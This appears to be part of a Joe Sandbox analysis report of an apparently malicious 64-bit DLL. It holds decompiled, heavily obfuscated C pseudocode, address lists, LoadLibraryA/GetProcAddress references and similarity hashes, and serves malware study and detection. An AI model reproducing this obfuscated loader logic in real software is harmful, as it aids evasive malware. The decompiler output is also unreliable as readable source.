                          				_t299 = __rsi +  *((intOrPtr*)(__rcx + 0xc0));
                          				 *( *((intOrPtr*)(__rcx + 0x30)) + 0xe8) =  *( *((intOrPtr*)(__rcx + 0x30)) + 0xe8) ^  *(__rcx + 0xc8) + 0x0000329d;
                          				if ( *((intOrPtr*)(_t322 - 0xc)) !=  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c8)) + 0x130)) - 0x23f7) goto 0x8c08bb6c;
                          				_t183 =  *( *((intOrPtr*)(__rcx + 0x1a0)) + 0x130) * 0xc285f6d4 - 0x228d;
                          				if (_t183 == 0) goto 0x8c08bb03;
                          				if (_t183 != 0) goto 0x8c08baf6;
                          				 *(__rcx + 0x1b0) = __rdx |  *_t326;
                          				_t281 =  *(__rcx + 0x1e0);
                          				 *(__rcx + 0x100) =  *(__rcx + 0x100) + _t281 * 0x1f2c;
                          				 *( *(__rcx + 0x40) + 0x198) =  *( *(__rcx + 0x40) + 0x198) | _t281 + 0x00001f2c;
                          				_t163 =  *(__rcx + 0x200) * 0x51e8c56e;
                          				r8d =  *(__rcx + 0xb0) * 0xf993a29a;
                          				if (_t163 - __r8 > 0) goto 0x8c08bc27;
                          				if (_t163 + 1 - __r8 <= 0) goto 0x8c08bb51;
                          				 *_t326 =  *_t326 + (__rbp ^  *_t326);
                          				goto 0x8c08bc27;
                          				_t186 =  *((intOrPtr*)( *__rcx + 0x188)) + 0x1407 - 0x343a;
                          				if (_t186 == 0) goto 0x8c08bbac;
                          				_t309 = __rbp | 0x00003a59;
                          				if (_t186 != 0) goto 0x8c08bba0;
                          				 *_t326 =  *_t326 - _t309;
                          				 *_t326 =  *_t326 *  *(__rcx + 0x110) * 0x343a;
                          				_t294 = _t299 +  *((intOrPtr*)(__rcx + 0xc0));
                          				_t187 = ( *(__rcx + 0x200) ^ 0x00000db8) - 0x3a5a;
                          				if (_t187 == 0) goto 0x8c08bbfd;
                          				_t284 = __rbp ^ 0x0000343a;
                          				if (_t187 != 0) goto 0x8c08bbf3;
                          				 *(__rcx + 0x78) = _t284;
                          				 *(__rcx + 0x1b0) =  *(__rcx + 0x1b0) ^ ( *(__rcx + 0x1b8) | 0x00003189);
                          				 *((long long*)( *(__rcx + 0x40) + 0xf0)) =  *((intOrPtr*)(__rcx + 0x70)) - 0x2103;
                          				 *( *(__rcx + 0x40) + 0x58) =  *(__rcx + 0x100) | _t328;
                          				if ( *_t294 == 0) goto 0x8c08be4e;
                          				asm("o16 nop [eax+eax]");
                          				_t189 =  *( *((intOrPtr*)(__rcx + 0x30)) + 0xb8) * 0x244f8775 - 0x30d6;
                          				if (_t189 == 0) goto 0x8c08bc9a;
                          				_t265 =  *(__rcx + 0x1e0);
                          				asm("o16 nop [eax+eax]");
                          				_t285 = _t284 - 1;
                          				if (_t189 != 0) goto 0x8c08bc80;
                          				 *(__rcx + 0x1e0) = _t265 + 1;
                          				 *(__rcx + 0x1b8) = _t265;
                          				_t312 =  *_t294;
                          				if (_t312 >= 0) goto 0x8c08bd3c;
                          				r8d =  *( *((intOrPtr*)(_t318 + 0x3c)) + _t318 + 0x88 + _t285 * 8);
                          				_t269 =  *((intOrPtr*)(__rcx + 0x1c8));
                          				r8d =  *(_t309 + _t318 + 0x1c);
                          				 *(__rcx + 0x1e0) =  *(__rcx + 0x1e0) +  *((intOrPtr*)(_t269 + 0x1b0));
                          				 *((long long*)(_t269 + 0x1b0)) =  *((long long*)(_t269 + 0x1b0)) + 1;
                          				r9d =  *((intOrPtr*)(_t309 +  *(__rcx + 0x40) * (_t285 -  *(__rcx + 0x40)) + _t318));
                          				 *( *((intOrPtr*)(__rcx + 0x1a0)) + 0xe0) =  *( *((intOrPtr*)(__rcx + 0x1a0)) + 0xe0) |  *((intOrPtr*)( *__rcx + 0x198)) + _t328;
                          				 *_t299 = _t312 + _t318;
                          				_t226 = __rbp -  *_t326;
                          				 *((intOrPtr*)(__rcx + 0x48)) =  *((intOrPtr*)(__rcx + 0x48)) + _t226;
                          				goto 0x8c08bdea;
                          				GetProcAddress(_t292);
                          				 *_t299 = _t226;
                          				_t291 =  *((intOrPtr*)(__rcx + 0x1c8));
                          				if ( *((intOrPtr*)(__rcx + 0x130)) - _t318 > 0) goto 0x8c08bd81;
                          				 *((intOrPtr*)(__rcx + 0x90)) =  *((intOrPtr*)(__rcx + 0x90)) +  *((intOrPtr*)(__rcx + 0x48)) - 0x2032;
                          				if ( *((intOrPtr*)(_t291 + 0x130)) - 0x3c5 - 0x3a59 >= 0) goto 0x8c08bdab;
                          				_t229 =  *(__rcx + 0x110);
                          				 *(__rcx + 0xc8) = _t229;
                          				 *(__rcx + 0x110) = _t229 + 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c0)) + 0x218)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1c0)) + 0x218)) + 0xfffffe78 - __rcx;
                          				if ( *__rcx -  *((intOrPtr*)(__rcx + 0x140)) < 0) goto 0x8c08bdea;
                          				_t235 = __rbp ^ 0x00001f2c;
                          				 *(__rcx + 0x1b0) =  *(__rcx + 0x1b0) | _t235;
                          				r8d = 0x36e7;
                          				r8d = r8d + 1;
                          				 *((intOrPtr*)(__rcx + 0x1f8)) =  *((intOrPtr*)(__rcx + 0x1f8)) - _t235 * 0x2598;
                          				if (r8d != _t291) goto 0x8c08bdf4;
                          				 *(__rcx + 0x220) =  *(__rcx + 0x1b0) ^  *(__rcx + 0x220) ^ 0x00003595;
                          				if ( *((long long*)(_t294 + 8)) != 0) goto 0x8c08bc50;
                          				_t296 = _a32;
                          				r15d = _a24;
                          				_t276 =  *(__rcx + 0x1e0) - _t296 |  *(__rcx + 0x1e0);
                          				 *(__rcx + 0x1e0) = _t276;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x1a0)) + 0x200)) - 0x544 - 0x329e >= 0) goto 0x8c08be9e;
                          				 *_t326 =  *_t326 + _t276 * _t296 * _t296;
                          				 *_t326 =  *_t326 ^ 0x00001663;
                          				if ( *((intOrPtr*)(_t322 + 0x14)) != 0) goto 0x8c08ba40;
                          				return 0;
                          			}





































                          0x7ff88c08b9b0
                          0x7ff88c08b9b3
                          0x7ff88c08b9b7
                          0x7ff88c08b9bb
                          0x7ff88c08b9c7
                          0x7ff88c08b9ce
                          0x7ff88c08b9da
                          0x7ff88c08b9f0
                          0x7ff88c08b9f6
                          0x7ff88c08b9fa
                          0x7ff88c08ba01
                          0x7ff88c08ba10
                          0x7ff88c08ba1c
                          0x7ff88c08ba22
                          0x7ff88c08ba26
                          0x7ff88c08ba2a
                          0x7ff88c08ba2e
                          0x7ff88c08ba32
                          0x7ff88c08ba32
                          0x7ff88c08ba4e
                          0x7ff88c08ba54
                          0x7ff88c08ba66
                          0x7ff88c08ba6c
                          0x7ff88c08ba72
                          0x7ff88c08ba86
                          0x7ff88c08ba94
                          0x7ff88c08baa3
                          0x7ff88c08baaa
                          0x7ff88c08bac8
                          0x7ff88c08badf
                          0x7ff88c08bae5
                          0x7ff88c08bafa
                          0x7ff88c08bafc
                          0x7ff88c08bb03
                          0x7ff88c08bb18
                          0x7ff88c08bb26
                          0x7ff88c08bb2d
                          0x7ff88c08bb37
                          0x7ff88c08bb48
                          0x7ff88c08bb62
                          0x7ff88c08bb64
                          0x7ff88c08bb67
                          0x7ff88c08bb7b
                          0x7ff88c08bb81
                          0x7ff88c08bb89
                          0x7ff88c08bba7
                          0x7ff88c08bba9
                          0x7ff88c08bbbe
                          0x7ff88c08bbcb
                          0x7ff88c08bbd8
                          0x7ff88c08bbde
                          0x7ff88c08bbe8
                          0x7ff88c08bbf7
                          0x7ff88c08bbf9
                          0x7ff88c08bc0e
                          0x7ff88c08bc20
                          0x7ff88c08bc35
                          0x7ff88c08bc3d
                          0x7ff88c08bc47
                          0x7ff88c08bc5f
                          0x7ff88c08bc65
                          0x7ff88c08bc67
                          0x7ff88c08bc77
                          0x7ff88c08bc86
                          0x7ff88c08bc8a
                          0x7ff88c08bc8c
                          0x7ff88c08bc93
                          0x7ff88c08bc9a
                          0x7ff88c08bca0
                          0x7ff88c08bcbe
                          0x7ff88c08bcc6
                          0x7ff88c08bcd6
                          0x7ff88c08bcfb
                          0x7ff88c08bd02
                          0x7ff88c08bd0c
                          0x7ff88c08bd26
                          0x7ff88c08bd2d
                          0x7ff88c08bd30
                          0x7ff88c08bd33
                          0x7ff88c08bd37
                          0x7ff88c08bd4d
                          0x7ff88c08bd53
                          0x7ff88c08bd56
                          0x7ff88c08bd6e
                          0x7ff88c08bd7a
                          0x7ff88c08bd91
                          0x7ff88c08bd93
                          0x7ff88c08bd9a
                          0x7ff88c08bda4
                          0x7ff88c08bdbc
                          0x7ff88c08bdd8
                          0x7ff88c08bddd
                          0x7ff88c08bde3
                          0x7ff88c08bdee
                          0x7ff88c08bdfb
                          0x7ff88c08be05
                          0x7ff88c08be23
                          0x7ff88c08be3d
                          0x7ff88c08be48
                          0x7ff88c08be55
                          0x7ff88c08be5d
                          0x7ff88c08be65
                          0x7ff88c08be6f
                          0x7ff88c08be88
                          0x7ff88c08be9b
                          0x7ff88c08bea2
                          0x7ff88c08beb2
                          0x7ff88c08bedb

                          APIs
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00007FF88C08DB93,?,?,?,?,?,?,?,00007FF88C08AD80), ref: 00007FF88C08BA66
                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00007FF88C08DB93,?,?,?,?,?,?,?,00007FF88C08AD80), ref: 00007FF88C08BD4D
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID:
                          • API String ID: 2574300362-0
                          • Opcode ID: b8fb5429e7cfc8db786e1fc3a60dd63ed19924fa30ef64d9c899e3a35c4c87c6
                          • Instruction ID: e119bd2e58cd2c7ce4f190720f4d57691fbb237d2606fb6b6e4b739dde6ab812
                          • Opcode Fuzzy Hash: b8fb5429e7cfc8db786e1fc3a60dd63ed19924fa30ef64d9c899e3a35c4c87c6
                          • Instruction Fuzzy Hash: 72D16832705B8486EB55CF2AD8987AD37A8F749B88F098136CE4D8B398DF38D551C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E00007FF87FF88C08F8F0(void* __ebx, void* __esi, void* __eflags, long long __rcx, long long __rdx, signed int* __r8, long long __r9, signed int* __r11) {
                          				void* __rbx;
                          				intOrPtr _t480;
                          				signed char _t492;
                          				signed int _t495;
                          				char _t508;
                          				intOrPtr _t509;
                          				signed int _t510;
                          				intOrPtr _t531;
                          				short _t543;
                          				intOrPtr _t548;
                          				intOrPtr _t549;
                          				intOrPtr _t553;
                          				intOrPtr _t557;
                          				signed int _t563;
                          				signed int _t582;
                          				signed int _t583;
                          				signed long long _t591;
                          				void* _t603;
                          				intOrPtr _t612;
                          				intOrPtr _t641;
                          				signed int _t669;
                          				signed int _t683;
                          				signed int _t695;
                          				signed int _t717;
                          				signed int _t719;
                          				void* _t731;
                          				void* _t733;
                          				void* _t734;
                          				intOrPtr _t737;
                          				long long _t738;
                          				intOrPtr _t741;
                          				long long _t742;
                          				intOrPtr _t743;
                          				long long _t744;
                          				signed long long _t745;
                          				long long _t746;
                          				signed long long _t748;
                          				intOrPtr _t752;
                          				signed long long _t755;
                          				intOrPtr _t756;
                          				intOrPtr _t763;
                          				signed long long _t765;
                          				intOrPtr _t767;
                          				intOrPtr _t772;
                          				signed long long _t774;
                          				intOrPtr _t776;
                          				signed long long _t777;
                          				intOrPtr _t778;
                          				signed long long _t780;
                          				signed long long _t781;
                          				intOrPtr _t782;
                          				signed long long _t783;
                          				signed long long _t784;
                          				signed long long _t791;
                          				signed long long _t792;
                          				signed long long _t793;
                          				signed long long _t794;
                          				signed long long _t795;
                          				intOrPtr _t798;
                          				intOrPtr _t803;
                          				signed long long _t806;
                          				signed long long _t807;
                          				signed int* _t811;
                          				signed int* _t812;
                          				signed int* _t813;
                          				signed int* _t814;
                          				signed int* _t816;
                          				signed long long _t819;
                          				intOrPtr _t822;
                          				signed long long _t842;
                          				signed long long _t845;
                          				intOrPtr _t853;
                          				signed int _t862;
                          				signed long long _t874;
                          				signed long long _t879;
                          				intOrPtr _t880;
                          				signed long long _t881;
                          				intOrPtr _t891;
                          				intOrPtr* _t892;
                          				signed long long _t893;
                          				signed long long _t897;
                          				signed int _t901;
                          				intOrPtr _t902;
                          				signed long long _t904;
                          				signed long long _t910;
                          				intOrPtr _t914;
                          				intOrPtr _t919;
                          				signed long long _t922;
                          				signed long long _t935;
                          				signed long long _t936;
                          				intOrPtr _t941;
                          				void* _t946;
                          				void* _t947;
                          				signed long long _t953;
                          				intOrPtr _t955;
                          				signed long long _t972;
                          				intOrPtr _t973;
                          				signed int _t974;
                          				signed int* _t979;
                          				intOrPtr _t984;
                          				signed long long _t994;
                          				signed long long _t996;
                          				signed long long _t1004;
                          				signed long long _t1007;
                          				long long _t1010;
                          				intOrPtr _t1011;
                          				intOrPtr _t1012;
                          				signed long long _t1017;
                          				long long _t1023;
                          
                          				_t603 = __ebx;
                          				 *((long long*)(_t946 + 0x20)) = __r9;
                          				 *((long long*)(_t946 + 0x10)) = __rdx;
                          				 *((long long*)(_t946 + 8)) = __rcx;
                          				_push(_t1010);
                          				_t947 = _t946 - 0xe8;
                          				_t737 =  *0x8c0b4140; // 0x0
                          				_t888 = __rcx;
                          				r11d =  *0x8c0b4123 & 0x000000ff;
                          				_t811 = __r8;
                          				r8d =  *0x8c0b416c & 0x0000ffff;
                          				_t1023 = __r9;
                          				 *((long long*)(_t947 + 0x80)) = __r11;
                          				 *(_t947 + 0x64) =  *(_t737 + 0x194c) & 0x0000ffff;
                          				r8w = r8w + 0xffff;
                          				 *(_t947 + 0x90) = __r11;
                          				_t738 =  *0x8c0b4180; // 0x0
                          				r11d = 0x1581;
                          				 *((long long*)(_t947 + 0xc8)) = _t738;
                          				 *0x8c0b4180 = _t738 + 1;
                          				 *0x8c0b416c = r8w;
                          				_t819 =  *__r8;
                          				r10d = r8w & 0xffffffff;
                          				r8w = r8w + 1;
                          				r9d = r8w & 0xffffffff;
                          				 *((long long*)(_t947 + 0xa0)) = __r9;
                          				 *((long long*)(_t947 + 0x88)) =  *((intOrPtr*)(__rcx + _t819 * 4));
                          				_t741 =  *0x8c0b4188; // 0x0
                          				_t742 =  *((intOrPtr*)(_t947 + 0x168));
                          				 *((long long*)(_t947 + 0xa8)) = _t742;
                          				_t743 =  *0x8c0b4158; // 0x0
                          				_t744 = _t743 + 1;
                          				 *0x8c0b416c = r8w;
                          				 *0x8c0b4158 = _t744;
                          				 *((long long*)(_t947 + 0xb8)) = _t744;
                          				 *(_t947 + 0x60) =  *0x8c0b414c & 0x000000ff;
                          				_t745 =  *0x8c0b4124;
                          				 *(_t947 + 0xb0) =  *(_t741 + 0x10 + _t819 * 4) ^  *(_t742 + 0x3360);
                          				_t822 =  *0x8c0b4160; // 0x0
                          				_t1004 = _t745 ^ 0x00001a15;
                          				 *(_t947 + 0x70) = _t1004;
                          				 *(_t947 + 0xd0) = _t745;
                          				 *(_t947 + 0xc0) = _t745;
                          				_t746 =  *0x8c0b4170; // 0x0
                          				 *((long long*)(_t947 + 0x98)) = _t746;
                          				r13d =  *( *__r8 + _t822) & 0x000000ff;
                          				_t31 = _t888 + 3; // 0x3
                          				_t748 =  *0x8c0b41a0; // 0x0
                          				 *((long long*)(_t947 + 0x78)) = _t1010;
                          				 *((char*)(_t748 + 0x598)) = ( *(_t31 + 0x868) & 0x000000ff) + 0x32;
                          				_t480 =  *0x8c0b4134; // 0x0
                          				r10d = r10d | ( *( *((intOrPtr*)(_t947 + 0x180)) +  *__r8 * 2) & 0x0000ffff) + _t480;
                          				 *0x8c0b4134 = _t480 + 1;
                          				 *(_t947 + 0x68) = r10d;
                          				 *0x8c0b4150 = __rcx + 0x97b;
                          				_t972 =  *0x8c0b4158; // 0x0
                          				r10d =  *0x8c0b4133 & 0x000000ff;
                          				r8d = r8d + 1;
                          				_t752 =  *0x8c0b4160; // 0x0
                          				 *0x8c0b4148 = r8d;
                          				 *__r8 =  *__r8 - 1;
                          				 *(_t947 + 0x50) =  *__r8;
                          				 *((intOrPtr*)(_t947 + 0x48)) = r10b;
                          				 *(_t947 + 0x40) =  *0x8c0b4148 + 0x1580;
                          				 *(_t947 + 0x38) =  *( *(_t947 + 0x160) + 0x38fe) & 0x0000ffff;
                          				 *(_t947 + 0x30) = ( *(( *__r11 << 2) + _t752) & 0x000000ff) / ( *( *(_t947 + 0x170) + _t972 * 2) & 0x0000ffff);
                          				 *(_t947 + 0x28) = 0x14f9;
                          				 *(_t947 + 0x20) = 0x13b6;
                          				_t492 = E00007FF87FF88C0742A0(0xa3f, __r8,  *0x8c0b4148, _t972);
                          				_t953 =  *((intOrPtr*)(_t947 + 0x80));
                          				_t973 =  *((intOrPtr*)(_t947 + 0x150));
                          				 *0x8c0b4132 = _t492;
                          				 *(0x423 + _t1004 * 8) =  *(0x423 + _t1004 * 8) | 0x00000806;
                          				_t755 =  *_t811;
                          				_t891 =  *0x8c0b41a8; // 0x0
                          				_t892 = _t891 +  *_t953;
                          				 *_t892 = ( *( *((intOrPtr*)(_t947 + 0x178)) + 0x10 + _t755 * 4) & 0xea) -  *_t892;
                          				_t756 =  *0x8c0b4140; // 0x0
                          				 *(_t756 + (8 + _t755 * 4) * 4) =  *(_t756 + (8 + _t755 * 4) * 4) | 0x00000d72;
                          				_t495 =  *0x8c0b4148; // 0x0
                          				_t812 =  &(_t811[2]);
                          				 *(_t947 + 0x140) = _t812;
                          				_t612 =  *0x8c0b4194; // 0x0
                          				 *((intOrPtr*)(_t973 +  *_t811 * 8)) = _t612 + 0xbde +  *((intOrPtr*)(_t953 + (_t495 + 7) * 8));
                          				 *_t812 =  *_t812 - 1;
                          				r8d =  *0x8c0b4148; // 0x0
                          				_t914 =  *0x8c0b4150; // 0x0
                          				 *((long long*)(_t947 + 0x48)) = 0x4df;
                          				_t893 =  *0x8c0b41a0; // 0x0
                          				_t994 =  *(_t973 + _t953 * 4 * 4) ^ _t953 * 0x00000004;
                          				 *0x8c0b41a0 = _t893 - 1;
                          				_t103 = _t953 + 4; // 0x4
                          				r9d =  *( *((intOrPtr*)(_t947 + 0x180)) + _t103 * 2) & 0x0000ffff;
                          				r9d = 0xf46;
                          				 *(_t947 + 0x40) = 0x183e / r9d;
                          				 *(_t947 + 0x38) =  *0x8c0b4168;
                          				 *(_t947 + 0x30) = _t994;
                          				 *(_t947 + 0x28) = (_t914 - _t892 >> 1) + _t892 >> 0xb;
                          				 *(_t947 + 0x20) =  *( *(_t947 + 0xb0) +  *(_t947 + 0x170) * 4) ^ 0x000010ea;
                          				_t508 = E00007FF87FF88C071520(0x183e / r9d, _t812,  *((intOrPtr*)(__r9 + 0x94 +  *_t812 * 4)),  *(_t947 + 0x170) * 0x18f8, _t973);
                          				r15d = r12d;
                          				_t919 =  *((intOrPtr*)(_t947 + 0x88));
                          				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x98)))) + _t919 + 3)) = _t508;
                          				_t509 =  *0x8c0b4168; // 0x0
                          				_t510 = _t509 + 3;
                          				if (r12d -  *((intOrPtr*)(0x1581 + _t510 * 4)) > 0) goto 0x8c09026a;
                          				r11d =  *(_t947 + 0x64) & 0x0000ffff;
                          				r9d = _t1004 + _t1004;
                          				r8d = _t1004 * 4;
                          				 *(_t947 + 0x70) = _t994;
                          				 *(_t947 + 0x160) = r9d;
                          				 *(_t947 + 0x140) = r8d;
                          				_t763 =  *0x8c0b4140; // 0x0
                          				_t1017 = r15d;
                          				 *(_t947 + 0x68) =  *(_t947 + 0x68) + ( *(_t763 + 0x14 + (_t1004 + _t1004 * 2) * 4) & 0x000016a9);
                          				_t765 =  *0x8c0b41a0; // 0x0
                          				_t842 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t765 * 8)) +  *0x8c0b4180;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + r8d * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + r8d * 8)) + _t842;
                          				 *(_t812 + _t1017 * 8) =  *(_t812 + _t1017 * 8) | _t1017;
                          				 *((short*)(0x1ae1 + _t1017 * 2)) = _t510 / _t842;
                          				_t955 =  *0x8c0b4150; // 0x0
                          				 *0x8c0b4150 = _t955 - 1;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t1004 * 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t1017 * 4)) < 0) goto 0x8c08ffbc;
                          				_t767 =  *0x8c0b4160; // 0x0
                          				_t897 = r9d;
                          				if ( *((intOrPtr*)(_t897 + _t919)) == 0xa0) goto 0x8c08ffbc;
                          				_t669 =  *0x8c0b4148; // 0x0
                          				if (_t669 - ( *0x8c0b4120 & 0x0000ffff) < 0) goto 0x8c08ffbc;
                          				_t974 =  *(_t947 + 0x170);
                          				_t161 = _t897 + 6; // 0x6
                          				if ( *((intOrPtr*)(_t974 + _t161 * 2)) != ( *0x8c0b4133 & 0x000000ff)) goto 0x8c08ffbc;
                          				r8w = r8w -  *0x8c0b414c;
                          				_t845 = 3 + _t897 * 4;
                          				r8w = r8w -  *(_t974 + _t845 * 2);
                          				 *(_t974 + _t845 * 2) = r8w;
                          				asm("cdq");
                          				 *(_t1010 + _t1017 * 8) = _t897;
                          				 *0x8c0b4150 = _t767;
                          				 *((char*)(_t919 +  *_t812)) = 0xa0;
                          				 *((long long*)( *_t812 * 8 + _t1010)) =  *((intOrPtr*)(_t947 + 0x138));
                          				r10d =  *0x8c0b4148; // 0x0
                          				_t813 =  &(_t812[2]);
                          				_t772 =  *0x8c0b4128; // 0x0
                          				_t941 =  *0x8c0b4150; // 0x0
                          				r10d = r10d - 1;
                          				_t774 = r10d;
                          				 *0x8c0b4148 = r10d;
                          				r10d =  *( *(_t947 + 0x170) + _t774 * 2) & 0x0000ffff;
                          				r10d = r10d - 0x1002;
                          				 *(_t947 + 0x40) = _t774;
                          				 *(_t947 + 0x38) = r10d;
                          				 *(_t947 + 0x30) = 0;
                          				 *(_t947 + 0x28) = _t994 + _t941;
                          				 *(_t947 + 0x20) = ( *( *(_t947 + 0xc0) +  *_t813 * 2) & 0x0000ffff) - 0xbd5;
                          				_t531 = E00007FF87FF88C0737F0(_t603, ((0xb70fbb5b * r10d >> 0x20) + r10d >> 0xa) + ((0xb70fbb5b * r10d >> 0x20) + r10d >> 0xa >> 0x1f), _t813, _t1017, _t941,  *(_t772 +  *_t812 * 4) * 0x1310);
                          				_t996 =  *(_t947 + 0x70);
                          				 *0x8c0b4168 = _t531;
                          				goto 0x8c090218;
                          				_t222 = _t1023 + 3; // 0x4
                          				r13d = _t222;
                          				_t776 =  *0x8c0b4140; // 0x0
                          				_t777 =  *((intOrPtr*)(_t947 + 0xa0));
                          				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + r13d * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + r13d * 8)) + ( *(_t776 +  *_t813 * 4) | _t996);
                          				r9d =  *0x8c0b416c & 0x0000ffff;
                          				_t853 =  *0x8c0b4160; // 0x0
                          				r9w = r9w + 0xffff;
                          				 *0x8c0b416c = r9w;
                          				_t901 =  *_t813;
                          				_t814 = _t813 - 8;
                          				r8d =  *(_t901 + _t853) & 0x000000ff;
                          				r8b = r8b + r15b;
                          				 *(_t853 +  *((intOrPtr*)(_t947 + 0x88))) = r8b;
                          				if (( *(_t947 + 0x60) & 0x000000ff) - 0x1977 > 0) goto 0x8c090213;
                          				_t731 = _t996 -  *0x8c0b4180; // 0x0
                          				if (_t731 != 0) goto 0x8c090213;
                          				 *(_t947 + 0x50) = _t1017;
                          				 *((char*)(_t947 + 0x48)) = 0x55;
                          				 *_t777 =  *_t777 - 1;
                          				 *((long long*)( *((intOrPtr*)(_t947 + 0x98)) + 0x20 + _t777 * 8)) =  *((long long*)( *((intOrPtr*)(_t947 + 0x98)) + 0x20 + _t777 * 8)) + 0x1970;
                          				_t250 = _t1010 + 0xa; // 0xe
                          				 *( *0x8c0b4148 + 0x578) = ( *0x8c0b4132 & 0x000000ff) % ( *( *0x8c0b4148 + 0x578) & 0x000000ff);
                          				_t683 =  *0x8c0b4148; // 0x0
                          				_t984 =  *0x8c0b4158; // 0x0
                          				_t778 =  *0x8c0b4138; // 0x0
                          				 *0x8c0b4148 = _t683 + 1;
                          				_t254 = _t901 + 1; // 0x2
                          				_t902 =  *0x8c0b4128; // 0x0
                          				_t257 = _t1010 - 2; // 0x2
                          				 *0x8c0b4148 = _t254;
                          				_t780 =  *0x8c0b4170; // 0x0
                          				_t781 = _t780 + 1;
                          				 *0x8c0b4170 = _t781;
                          				_t782 =  *0x8c0b41a8; // 0x0
                          				r11d =  *( *_t814 + _t782 + 1) & 0x000000ff;
                          				_t783 =  *0x8c0b41a0; // 0x0
                          				_t784 = _t783 + 1;
                          				 *0x8c0b4158 = _t984 + 1;
                          				 *0x8c0b41a0 = _t784;
                          				 *(_t947 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t784 * 8)) + _t1017;
                          				r9d = 0xdc;
                          				 *(_t947 + 0x38) = r10d;
                          				 *(_t947 + 0x30) = _t996;
                          				 *(_t947 + 0x28) = 0x55;
                          				 *(_t947 + 0x20) =  *( *((intOrPtr*)(_t947 + 0x78)) + _t781 * 8);
                          				_t543 = E00007FF87FF88C0742A0( *((intOrPtr*)(_t778 + _t250 * 8)), _t814,  *((intOrPtr*)(_t902 + _t254 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t784 * 8)) + _t1017);
                          				_t904 =  *((intOrPtr*)(_t947 + 0x180));
                          				 *(_t947 + 0x40) = _t1017;
                          				 *((short*)(_t904 + 6 +  *_t814 * 2)) = _t543;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x148)) +  *_t814 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + 0x1278)) -  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x148)) +  *_t814 * 4)) - r15d;
                          				_t862 =  *0x8c0b4160; // 0x0
                          				r8d =  *(_t1017 + _t862) & 0x000000ff;
                          				 *(_t947 + 0x38) = _t862;
                          				 *(_t947 + 0x30) = _t904;
                          				 *(_t947 + 0x28) = 0x171;
                          				 *(_t947 + 0x20) =  *((intOrPtr*)(_t902 + _t257 * 4));
                          				_t548 = E00007FF87FF88C0737F0(_t603, 0x1994, _t814, _t862, _t904, _t1017);
                          				_t295 = _t1010 + 0x13; // 0x17
                          				_t922 =  *((intOrPtr*)(_t947 + 0x88));
                          				_t935 =  *((intOrPtr*)(_t947 + 0x98));
                          				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t295 * 4)) = _t548;
                          				_t1011 =  *((intOrPtr*)(_t947 + 0x78));
                          				r8d =  *(_t947 + 0x140);
                          				r15d = r15d + 1;
                          				r9d =  *(_t947 + 0x160);
                          				r8d = r8d + 4;
                          				_t549 =  *0x8c0b4168; // 0x0
                          				r9d = r9d + 2;
                          				 *(_t947 + 0x140) = r8d;
                          				 *(_t947 + 0x160) = r9d;
                          				if (r15d -  *((intOrPtr*)(0x1581 + (_t549 + 3) * 4)) <= 0) goto 0x8c08fd80;
                          				 *(_t947 + 0x70) = _t777;
                          				 *(_t947 + 0x140) = _t814;
                          				_t717 =  *( *((intOrPtr*)(_t947 + 0xa0)) +  *_t814 * 2) & 0x0000ffff;
                          				_t733 = _t935 -  *0x8c0b4150; // 0x0
                          				if (_t733 > 0) goto 0x8c090475;
                          				r14d = _t935 * 4;
                          				 *((long long*)((_t935 + 4) * 8 + _t1011)) =  *0x8c0b4148 * 0xcea + _t717 -  *((intOrPtr*)((_t935 + 4) * 8 + _t1011));
                          				_t979 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t922 * 4));
                          				_t791 =  *((intOrPtr*)(_t947 + 0x158));
                          				r8d =  *(_t922 + _t791) & 0x000000ff;
                          				_t553 =  *0x8c0b4168; // 0x0
                          				 *0x8c0b4168 = _t553 - 1;
                          				_t792 =  *0x8c0b41a0; // 0x0
                          				_t793 = _t792 - 1;
                          				 *0x8c0b41a0 = _t793;
                          				_t794 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t793 * 8));
                          				 *(_t947 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x188)) + _t794 * 4));
                          				 *(_t947 + 0x38) = 0x2f3;
                          				 *(_t947 + 0x30) =  *(_t947 + 0x68) + _t794;
